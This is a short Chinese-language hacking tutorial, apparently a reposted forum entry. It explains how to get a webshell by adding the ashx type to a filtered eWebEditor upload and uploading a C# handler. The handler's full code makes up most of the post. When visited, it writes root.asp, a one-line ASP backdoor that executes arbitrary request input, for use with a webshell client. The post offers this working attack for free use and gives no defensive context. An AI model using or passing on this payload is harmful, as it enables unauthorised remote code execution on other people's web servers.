利用ashx脚本写入脚本文件拿webshell

刚在逛黑客笔记（http://hacknote.com/） 的时候看到了一个很不错的上传突破，顺便发过来给大家分享下，该方法是利用在一些比较BT的上传上面，原文内容是写在ewebeditor过滤了 asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型，上传一个ashx脚本上去，脚本内容如下：

<%@ WebHandler Language="C#" class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
    
     public void ProcessRequest (HttpContext context) {
         context.Response.ContentType = "text/plain";
        
         StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
         file1.Write("<%response.clear:execute request(\"root\"):response.End%>");
         file1.Flush();
         file1.Close();
        
     }

     public bool IsReusable {
         get {
             return false;
         }
     }

}

       然后访问上传后的ashx文件，就会在同目录下生成一个root.asp的一句话木马，然后使用一句话木马客户端连接即可。利用方面就大家自由发挥了！